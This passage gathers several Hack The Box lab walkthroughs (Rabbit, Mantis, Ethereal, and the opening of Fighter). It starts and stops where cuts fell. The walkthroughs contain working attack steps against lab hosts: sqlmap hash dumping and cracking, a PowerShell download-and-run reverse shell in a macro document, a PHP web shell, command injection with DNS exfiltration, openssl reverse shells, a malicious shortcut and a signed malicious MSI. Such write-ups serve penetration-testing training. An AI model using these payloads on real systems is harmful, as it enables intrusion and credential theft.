redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
[15:16:50] [INFO] heuristics detected web page charset 'ISO-8859-2'
[15:16:50] [INFO] checking if the target is protected by some kind of WAF/IPS
[15:16:50] [INFO] testing if the target URL content is stable
[15:16:51] [INFO] heuristic (basic) test shows that POST parameter 'compId' might be injectable (possible DBMS: 'MySQL')
[15:16:51] [INFO] testing for SQL injection on POST parameter 'compId'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) value? [Y/n] Y
--snip--
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[15:18:21] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'c:\SQLMAP\txt\wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[15:18:21] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[15:18:21] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[15:18:21] [INFO] starting 4 processes
[15:18:2515:18:25] [] [INFOINFO] cracked password '] current status: 15091... /barcelona' for user 'Malek'
[15:18:31] [INFO] cracked password 'popcorn' for user 'Dumah'
[15:18:32] [INFO] cracked password 'santiago' for user 'Moebius'
[15:18:56] [INFO] cracked password 'pussycatdolls' for user 'Ariel'
Database: secret
Table: users
[10 entries]
+----------+--------------------------------------------------+
| Username | Password |
+----------+--------------------------------------------------+
| Zephon | 13fa8abd10eed98d89fd6fc678afaf94 |
| Kain | 33903fbcc0b1046a09edfaa0a65e8f8c |
| Dumah | 33da7a40473c1637f1a2e142f4925194 (popcorn) |
| Magnus | 370fc3559c9f0bff80543f2e1151c537 |
| Raziel | 719da165a626b4cf23b626896c213b84 |
| Moebius | a6f30815a43f38ec6de95b9a9d74da37 (santiago) |
| Ariel | b9c2538d92362e0e18e52d0ee9ca0c6f (pussycatdolls) |
| Turel | d322dc36451587ea2994c84c9d9717a1 |
| Dimitri | d459f76a5eeeed0eca8ab4476c144ac4 |
| Malek | dea56e47f1c62c30b83b70eb281a6c39 (barcelona) |
+----------+--------------------------------------------------+

[15:19:04] [INFO] table 'secret.users' dumped to CSV file 'C:\Users\jacco\.sqlmap\output\10.10.10.71\dump\secret\users.csv'
[15:19:04] [INFO] fetched data logged to text files under 'C:\Users\jacco\.sqlmap\output\10.10.10.71'

[*] ending @ 15:19:04 /2019-05-15/

Exploitation

Where do we use these obtained credentials now? Let’s try in
https://10.10.10.71/owa

We use found  valid credentials:

Ariel:pussycatdolls

Once we have entered to the /owa the first thing will be to check the mails:

As we read in these emails, we could use a malicious Open Office to get shell but considering the PowerShell constraint and the Windows Defender
In metasploit there’s an exploit that could work:

exploit/multi/misc/openoffice_document_macro

We rename the file obtained to zip and edit the file replacing the payload by:

powershell.exe IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.20/powercat.ps1');powercat -c 10.10.14.20 -p 1234 -e cmd
Because of the PowerShell constraint we must use the -version 2 option:
powershell.exe -version 2 IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.20/powercat.ps1');powercat -c 10.10.14.20 -p 1234 -e cmd

Send an email to all, containing our malicious .odt file:

Two years later, the answer to resolving headaches with attachments in Outlook Web Access (OWA) remains unchanged: Use Internet Explorer, not Edge, not Chrome, not Firefox.

And now we wait for it to be executed by an user. (This will take appprox 7 minutes, if it doesn’t after 10 reset the box.

c:\Python37>python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.71 - - [13/May/2019 14:45:17] "GET /powercat.ps1 HTTP/1.1" 200 -
C:\Users\jacco>nc -lvp 1234
listening on [any] 1234 ...
10.10.10.71: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.71] 20231: NO_DATA
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Program Files (x86)\OpenOffice 4\program>whoami
whoami
htb\raziel

c:\Users\Raziel\Desktop>type user.txt
type user.txt
c6f*****e9c

Post-Exploitation

c:\>dir wamp64
dir wamp64
Volume in drive C has no label.
Volume Serial Number is AEA8-5415

Directory of c:\wamp64

10/28/2017 11:13 AM <DIR> .
10/28/2017 11:13 AM <DIR> ..
10/28/2017 12:19 PM <DIR> alias
10/28/2017 11:13 AM <DIR> apps
12/31/2010 09:39 AM 4,790 barimage.bmp
10/28/2017 11:15 AM <DIR> bin
10/28/2017 11:13 AM <DIR> cgi-bin
01/08/2017 10:13 AM 28,470 images_off.bmp
01/08/2017 10:13 AM 28,470 images_on.bmp
09/01/2017 04:30 PM 3,978 install-english.txt
10/28/2017 11:13 AM <DIR> lang
11/06/2015 11:00 AM 8,156 license-english.txt
10/28/2017 11:18 AM <DIR> logs
09/01/2017 09:44 AM 5,741 mariadb_support_en.txt
09/01/2017 04:20 PM 1,289 read_after_install-english.txt
10/28/2017 11:13 AM <DIR> scripts
05/13/2019 12:44 PM <DIR> tmp
10/28/2017 11:16 AM 4,038,372 unins000.dat
10/28/2017 11:13 AM 1,401,105 unins000.exe
10/28/2017 11:13 AM 185 uninstall_services.bat
10/29/2017 10:32 PM 2,086 wampmanager.conf
09/03/2008 03:46 PM 1,233,408 wampmanager.exe
11/16/2017 07:57 PM 546,316 wampmanager.ini
08/30/2017 09:28 AM 29,431 wampmanager.tpl
05/13/2019 01:56 PM <DIR> www
14 File(s) 7,331,797 bytes
11 Dir(s) 25,699,479,552 bytes free

c:\>

We see that the Web service of port 8080 is served by Wamp64. Sometimes this service is run as system.
Let’s see if we have write permissions and who’s running it:

c:\>cacls wamp64
cacls wamp64
c:\wamp64 NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Administrators:(OI)(CI)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
BUILTIN\Users:(CI)(ID)(special access:)
FILE_APPEND_DATA

BUILTIN\Users:(CI)(ID)(special access:)
FILE_WRITE_DATA

CREATOR OWNER:(OI)(CI)(IO)(ID)F

c:\>

Let’s upload a php webshell:

c:\Python37>type puckie.php
  <?php echo shell_exec($_GET["cmd"]); ?>
c:\Python37>python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.71 - - [13/May/2019 14:45:17] "GET /powercat.ps1 HTTP/1.1" 200 -
10.10.10.71 - - [13/May/2019 14:57:26] "GET /puckie.php HTTP/1.1" 200 -
c:\Users\Raziel\Desktop>certutil -urlcache -split -f http://10.10.14.20/puckie.php c:\wamp64\www\puckie.php
certutil -urlcache -split -f http://10.10.14.20/puckie.php c:\wamp64\www\puckie.php
**** Online ****
0000 ...
002c
CertUtil: -URLCache command completed successfully.
c:\Users\jacco>curl http://10.10.10.71:8080/puckie.php?cmd=whoami
  nt authority\system
c:\Users\jacco>curl http://10.10.10.71:8080/puckie.php?cmd=type%20c:\users\administrator\desktop\root.txt
0b2*****d54

Now we can read the flag and even get shell as System easily.

Author: Jacco Straathof

Reference used : https://ironhackers.es/en/writeups/writeup-rabbit-hackthebox/

HTB – Mantis

Today we are going to solve another CTF challenge “Mantis” which is categories as retired lab presented by Hack the Box for making online penetration practices. Solving challenges in this lab is not that much easy until you don’t have some knowledge of Penetration testing. Let start and learn how to analyze any vulnerability in a network then exploit it for retrieving desired information.

Level: Intermediate

Task: find user.txt and root.txt file on the victim’s machine.

Since these labs are online accessible therefore they have static IP. The IP of Mantis is 10.10.10.52 so let’s initiate with nmap port enumeration.

root@kali# nmap -sC -sV -oA nmap 10.10.10.52
# Nmap 7.70 scan initiated Tue May 7 13:08:49 2019 as: nmap -sC -sV -oA nmap 10.10.10.52
Nmap scan report for 10.10.10.52
Host is up (0.032s latency).
Not shown: 980 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2019-05-07 17:09:18Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info: 
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: MANTIS
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: mantis.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2019-05-05T21:17:25
|_Not valid after: 2049-05-05T21:17:25
|_ssl-date: 2019-05-07T17:10:12+00:00; +2s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
8080/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Tossed Salad - Blog
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49167/tcp open msrpc Microsoft Windows RPC
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 48m02s, deviation: 1h47m21s, median: 1s
| ms-sql-info: 
| 10.10.10.52:1433: 
| Version: 
| name: Microsoft SQL Server 2014 RTM
| number: 12.00.2000.00
| Product: Microsoft SQL Server 2014
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb-os-discovery: 
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: mantis
| NetBIOS computer name: MANTIS\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: mantis.htb.local
|_ System time: 2019-05-07T13:10:15-04:00
| smb-security-mode: 
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled and required
| smb2-time: 
| date: 2019-05-07 13:10:12
|_ start_date: 2019-05-05 17:15:54

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 7 13:11:40 2019 -- 1 IP address (1 host up) scanned in 170.33 seconds

From the given below image, you can observe we found so many ports are open in the victim’s network.

First of all, we browse target IP through port 1337 in our web browser and saw following the image of IIS7 and although here I didn’t get any clue for next step therefore automatically next I move for directory buster.

Then I preferred to use dirbuster tool and chose directory list 2-3 medium.txt file for directory brute force attack on //10.10.10.52:1337

root@kali:~/htb/mantis# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.52:1337 -o gobuster-mantis.log

=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.52:1337/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2019/05/08 06:22:22 Starting gobuster
=====================================================
/secure_notes (Status: 301)

As result, I found a directory /secure notes

Here I saw two files dev_notes and web.config among these I’m interested in dev_notes test file to let’s open it.

When I open a dev_notes text file I read following contents as shown in below image and realize that it points towards a database “orcharddb” have “admin” as username, now I only need to know the required password for login into the database.

To me, the file “/dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt” was looking suspicious as “NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx” was base 64 encoded, therefore, I need to decode this text for the correct assumption of getting the password.

root@kali:~/htb/mantis# curl http://10.10.10.52:1337/secure_notes/dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt
1. Download OrchardCMS
2. Download SQL server 2014 Express ,create user "admin",and create orcharddb database
3. Launch IIS and add new website and point to Orchard CMS folder location.
4. Launch browser and navigate to http://localhost:8080
5. Set admin password and configure sQL server connection string.
6. Add blog pages with admin user.

Credentials stored in secure format
OrchardCMS admin creadentials 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001
SQL Server sa credentials file namez

dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt contains some base64-encoded text.

root@kali:~/htb/mantis# echo NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx | base64 -d
6d2424716c5f53405f504073735730726421

This looks like a hex string. Let’s convert it to ASCII:

root@kali:~/htb/mantis# echo 6d2424716c5f53405f504073735730726421 | xxd -r -p
m$$ql_S@_P@ssW0rd!

After decoding the above hex text finally I found a password for admin user.

Using mssqlclient.py we are going to connect to ms SQL server . Now let login into the database using database name and above-found credential via port 1433

root@kali:~/htb/mantis# ./mssqlclient.py htb.local/admin@10.10.10.52
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

Password: m$$ql_S@_P@ssW0rd!
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 7208) 
[!] Press help for extra shell commands
SQL> select @@version
Microsoft SQL Server 2014 - 12.0.2000.8 (X64) 
Feb 20 2014 20:04:26 
Copyright (c) Microsoft Corporation
Express Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1) (Hypervisor)
SQL> SELECT name FROM master..sysdatabases
master 
tempdb 
model 
msdb 
orcharddb 
SQL> use orcharddb
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: orcharddb
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'orcharddb'.
SQL> SELECT COLUMN_NAME 'All_Columns' FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='blog_Orchard_Users_UserPartRecord '
Id 
UserName 
Email 
NormalizedUserName 
Password 
PasswordFormat 
HashAlgorithm 
PasswordSalt 
RegistrationStatus 
EmailStatus 
EmailChallengeToken 
CreatedUtc 
LastLoginUtc 
LastLogoutUtc 
SQL> select UserName,Password from blog_Orchard_Users_UserPartRecord
admin 
AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A== 
James 
J@m3s_P@ssW0rd! 
SQL>

We had manually added target IP with htb.local and matis.htb.local the domain names which we have found through nmap in our local host file.

Then we have installed impacket from git hub as given below command.

git clone https://github.com/CoreSecurity/impacket.git

Impacket contains goldenpac python file which is used for post exploitation, now execute given below command and access the victim’s terminal.

root@kali:~/htb/mantis# goldenPac.py htb.local/james@mantis.htb.local
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

Password: J@m3s_P@ssW0rd!
[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller mantis.htb.local
[*] mantis.htb.local found vulnerable!
[*] Requesting shares on mantis.htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file wGWklYmG.exe
[*] Opening SVCManager on mantis.htb.local.....
[*] Creating service AgUh on mantis.htb.local.....
[*] Starting service AgUh.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

c:\Users\james\Desktop>type user.txt
8a8*****54d

c:\Users\Administrator\Desktop>type root.txt
209*****567

Author: Jacco Straathof

HTB – Ethereal

Today we are going to solve another CTF challenge “Ethereal”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Insane

Task: To find user.txt and root.txt file

Note: Since these labs are online available therefore they have a static IP. The IP of Access is 10.10.10.106.

Walkthrough

Let’s start off with scanning the network to find our target.

root@kali:~/htb/ethereal# nmap -sC -sV -oA nmap 10.10.10.106
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-02 13:49 EDT
Nmap scan report for ethereal.htb (10.10.10.106)
Host is up (0.11s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV IP 172.16.249.135 is not the same as 10.10.10.106
| ftp-syst: 
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 10.0
| http-methods: 
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ethereal
8080/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=ethereal.htb
| http-server-header: 
| Microsoft-HTTPAPI/2.0
|_ Microsoft-IIS/10.0
|_http-title: 401 - Unauthorized: Access is denied due to invalid credentials.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.80 seconds

. 1. Use the anonymous account Anonymous login, you can find the FDISK.zip compressed file, switch the transfer mode to binary before downloading, otherwise it is often because Network factor causes download failure

root@kali:~/htb/ethereal# wget --no-passive-ftp -m ftp://anonymous:anonymous@10.10.10.106
Ftp server

2. Unzip FDISK.zip and get an image file. After identifying with the file command, it was found to be a disk in FAT format. Use mount -t vfat /root/FDISK /mnt/htbdisk to mount the disk and extract the two files pbox.dat and pbox.exe. Install the xp virtual machine and double-click to run pbox.exe and find that this is a 16-bit application and cannot run directly.

Pbox.exe

win32.16-bit program simulator is very easy to find, DosBox is currently the most famous one, many arcade games can run, such as Prince of Persia, tank wars,enter pbox first hanging

4. This may be a version compatibility issue. Fortunately, DosBox (apt-get install dosbox) can be installed in the kali environment, but due to the Dos protection mode, a similar < no DPMI – Get csdpmi*b.zip may be reported. > error. Solution can refer to: https://www.linuxtopia.org/online_books/linux_tool_guides/the_sed_faq/sedfaq5_004.html The core of solving the problem is to download CWSDPMI.EXE and then throw it into the pbox.exe directory, you can run pbox.exe normally.

5. The password entered is password. After entering, it is a database. You can see the related content by clicking the corresponding table item, from which you can export a bunch of user name and password. The valid combination is:

user: alan
password: !C414m17y57r1k3s4g41n!

Pbox database

6. The obtained username and password can be used to log in to port 8080. This is a Test Connection page. According to the Ping Address prompt, it is not difficult to think of this as a command injection vulnerability.

8080 port login

7. The problem that needs to be solved is how to view the echo. In the Linux environment, the ping-p is commonly used, but the ping command of windows does not have the -p option, so the only thing that can be used is the nslookup command, which is combined with the tokens parameter. The result of the command, you also need to use the for loop of the cmd script to feedback the results, for example, I need to look at the second line of netstat -ano results, that is, all ip and port results, the command entered in the web is:

127.0.0.1 | for / f "tokens=2" %I in ('netstat -ano') do nslookup %I 10.10.8.20

About the for /f script loop body can be seen https://www.youtube.com/watch?v=jMS6LkMdAHI
need Note that the tokens parameter can be cascaded. For example, I want to see the 1 to 6 lines of the result. I only need to add tokens=1, 2, 3, 4, 5, 6 and the corresponding placeholder %a.%b.%c. %d.%e.%f can be as follows:
127.0.0.1 | for /f “tokens=1,2,3,4,5,6” %a in (‘type c:\xxxxx.txt’) do nslookup %a.%b.%c.%d.%e.%f 10.10.8.8
After executing command injection on the web, it is possible to start tcpdump or wireshark. Filter dns to see the command echo: (below) Running tasklist because nslookup is failing It performs 2 queries, so the results will be repeated)

Wireshark capture results

8. Enumerate the firewall rules, netsh advfirewall firewall show rule name=all is the command to view the windows firewall rules, but can not be executed normally in the RCE environment, so you need to find a writable path, dump the results into a file, and then Use the type method to retrieve the content. Usually the c:\users\public directory is the path with the lowest privilege, but the direct write is a failure. Try to use the icacls command to enumerate the directory permissions. Finally, the current user alan can be written to C:\users\public\desktop\ Shortcuts\, eventually read the firewall configuration: only TCP 73 and 136 ports are allowed to communicate.
Enumeration permissions:

On the ping page, I tried to do the ‘netsh advfirewall firewall show rule name=all’ but piping that to an nslookup will always crash the webpage, so
I did the following instead

127.0.0.1 & netsh advfirewall firewall show rule name=all|findstr "Rule Name:"|findstr "Allow" > C:\users\public\desktop\shortcuts\firewall.rulename.allow

This will generate a file called firewall.rulename.allow and it is stored in a subfolder under public, that is a folder  Ethereal\Alan has write access to).
Now we read the file using the method above, We display the firewall rule names

127.0.0.1 & for /f "tokens=1,2,3,4,5,6,7,8" %a in ('type c:\users\public\desktop\shortcuts\firewall.rulename.allow') do nslookup %a.%b.%c.%d.%e.%f.%g.%h 10.10.14.20

result:

root@kali:~/htb/ethereal# responder -I tun0
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.20]
Challenge set [random]
Don't Respond To Names ['ISATAP']

[+] Listening for events...
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.ICMP.Reply
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.ICMP.Request
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.UDP.Port.53
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.TCP.Ports.73.136
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.Port.80.8080
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.ICMP.Request
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.ICMP.Reply

Continue to search for clues in the system, use dir to retrieve the C drive, and finally find the Openssl-v1.1.0 version installed in the C:\Program Files (x86) directory, we will use it to implement the shell.
A command that displays a more complete dir result:

127.0.0.1 & cmd.exe /V /C "for /f " delims= " %e in ('DIR /B C:\') do cmd /c nslookup -querytype=A %e.a.a 10.10.14.20"

10. The CS working mode of openssl is not familiar to me, so first build the simulation environment locally, the official website https://www.openssl.org can check the command parameters, and download the source code, but there is no installation package. The installation packages for each version can be downloaded at http://slproweb.com/products/Win32OpenSSL.html . The installation process is all the way to the next.

Openssl for windows

11. On the kali side, first set up the openssl server. You need a private key and a certificate, so run the command:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
then have some Certificate information needs to be filled in, free to do it, format is no problem, such as e-mail, country shorthand
For questions about command parameters, please refer to the IBM documentation:
https://www.ibm.com/support/knowledgecenter/en/SSWHYP_4.0.0 /com.ibm.apimgmt.cmc.doc/task_apionprem_gernerate_self_signed_openSSL.html

Generate certificate

12. Using openssl’s s_client to connect to the server, the test in the simulation environment found that the work of openssl is somewhat like the nc without the -e option, what you input, what the other party displays, and can not execute the command. It is conceivable to use the pipe character to redirect input and output, that is, to redirect an openssl connection to cmd.exe via the pipe character “|”, and then use a pipe character “|” to redirect the operation result to openssl. A connection. In short:
openssl s_client 1 —->input | cmd.exe | openssl s_client 2 —->output
This is why firewall rules are going to release two ports.
The RCE command that translates to the web side is:

127.0.0.1 & START "" cmd /c "C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.20:73 | cmd.exe |C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.20:136"
Note that in the actual attack target, we have to open two terminals at the same time, one openssl server 73 and another openssl Server 136, server listening command:
openssl s_server -quiet -key key.pem -cert cert.pem -port 73
openssl s_server -quiet -key key.pem -cert cert.pem -port 136
I enter in port 73 port Command and press Enter, then submit the above RCE command on the web side to push the input into the pipeline, and view the result in the terminal of port 136.
13. After getting a low-privileged shell, we can get the next step in the c:\users\alan\Desktop path. He told us that there is a VS shortcut in the Public Desktop path, let us use it.
Lead file

14. Create  a malicious lnk shortcut  with powershell

PS C:\Users\jacco> $WScript = New-Object -ComObject 'wscript.shell'
PS C:\Users\jacco $SC = $WScript.CreateShortcut('Puckie.lnk')
PS C:\Users\jacco $SC


FullName : C:\Users\jacco\Puckie.lnk
Arguments :
Description :
Hotkey :
IconLocation : ,0
RelativePath :
TargetPath :
WindowStyle : 1
WorkingDirectory :

PS C:\pentest> $SC.TargetPath="C:\windows\system32\cmd.exe"
PS C:\pentest> $SC.Arguments="/c c:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.20:73 | cm
d c:\progra~2\openssl-v1.1.0/bin\openssl.exe s_client -connect 10.10.14.20:136"
PS C:\Users\jacco $SC

FullName : C:\Users\jacco\Puckie.lnk
Arguments : /c c:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.20:73 | cmd
c:\progra~2\openssl-v1.1.0/bin\openssl.exe s_client -connect 10.10.14.20:136
Description :
Hotkey :
IconLocation : ,0
RelativePath :
TargetPath : C:\Windows\System32\cmd.exe
WindowStyle : 1
WorkingDirectory :

PS C:\Users\jacco> $SC.Save()
PS C:\Users\jacco> dir C:\users\jacco\*.lnk

Directory: C:\users\jacco

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/4/2019 7:39 PM 1219 Puckie.lnk

The malicious shortcuts are as follows, you can see the commands that need to be executed at the shortcut target bar.

15. Upload a malicious shortcut and override c:\users\public\desktop\shortcuts\Visual Studio 2017.lnk. Note that uploading a .lnk file directly may fail and can be renamed to a .txt suffix upload. The upload process also utilizes the pipeline, but the original connection must be disconnected first.

Kali Run: openssl s_server -quiet -key key.pem -cert cert.pem -port 73 < malicious.txt
web run: 10.10.14.20|C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.20:73 > c:\users\public\desktop\shortcuts\out.txt (note that the suffix is ​​changed after the upload is successful)
Re-establish the shell connection
shell run: del “c:\users\public\desktop \shortcuts\Visual Studio 2017.lnk” & copy “c:\users\public\desktop\shortcuts\out.lnk” “c:\users\public\desktop\shortcuts\Visual Studio 2017.lnk”

16. Soon to get a new shell, in this shell, do not need to rely on the web, you can directly enter in 73, view the results in 136, the operation is smooth, a lot of user.txt in the jorge user desktop
User.txt

17. Continue to search. You can find that there are two suspicious folders on the D drive, one is Certs, which contains the certificate file, and the other is the DEV folder, which stores another clue file. This clue is well understood. As long as a malicious msi installation package is generated and placed in this path, the Rupal user will come to the point and combine the certificate file. This is probably to generate a signed msi.

Lead file 2

18. Direct type certificate files will be garbled and cannot be copied. At present, we do not have a download channel, so I thought of using the base64 encoding function of openssl to print out the content, the command is as follows:
C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe base64 -in MyCA.cer
C: \Progra~2\OpenSSL-v1.1.0\bin\openssl.exe base64 -in MyCA.pvk copies
the base64 encoded text to kali and restores it with base64 -d decoding.

Obtain a certificate

19. Generate msi, we use the graphical interface of the EMCO MSI Package Builder to operate. First create a new project, then click Custom Actions, right-click on the new Pre-Post Actions button, and fill in the key parameters to create the MSI Package. (The password is left blank)

Malicious msi generation

20. Sign the msi with the downloaded certificate. This requires .NET Framework 4 and winsdk, which can be downloaded at:
.NET Framework 4: https://www.microsoft.com/en-us/download/details.aspx?id=17851
winsdk: https: //www.microsoft.com/en-us/download/confirmation.aspx?id=8279 Once
installed, you can start signing. The commands are as follows:
makecert -n “CN=Ethereal” -pe -cy end -ic C:\MyCA.cer -iv C:\MyCA.pvk -sky signature -sv C:\hack.pvk C:\hack.cer
pvk2pfx -pvk C:\hack.pvk -spc C:\hack.cer -pfx C:\hack.pfx
signtool sign /f C:\hack.pfx C:\shell.msi
If the signature is successful, you can see the following prompt:

Successful signature

21. Upload the signed msi to d:\dev\msis\shell.msi, then exit the two openssl connections of 73 and 136 and listen to them again. In about 1 minute, the rupal user’s shell will go online. Read root.txt in his Desktop path

1cb6f1fc220e3f2fcc0e3cd8e2d9906f

22. If the deployment of msi is not successful, you need to try the second time. You must regenerate an msi and sign the upload. Because the installed msi is already registered in the system, it will not run again. You can add it from the control panel. I saw them in the removal program, but now in this environment we have no way to uninstall the msi installed before.

Author : Jacco Straathof

HTB – Fighter

Today we are going to solve another CTF challenge “Fighter”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Intermediate

Task: To find user.txt and root.txt file

Note: Since these labs are online available therefore they have a static IP. The IP of Fighter is 10.10.10.72

Let’s start off with our basic nmap command to find out the open ports and services.

C:\Users\jacco>nmap -sC -sV -T4 10.10.10.72
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-24 09:46 W. Europe Summer Time
Nmap scan report for streetfighterclub.htb (10.10.10.72)
Host is up (0.029s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: StreetFighter Club
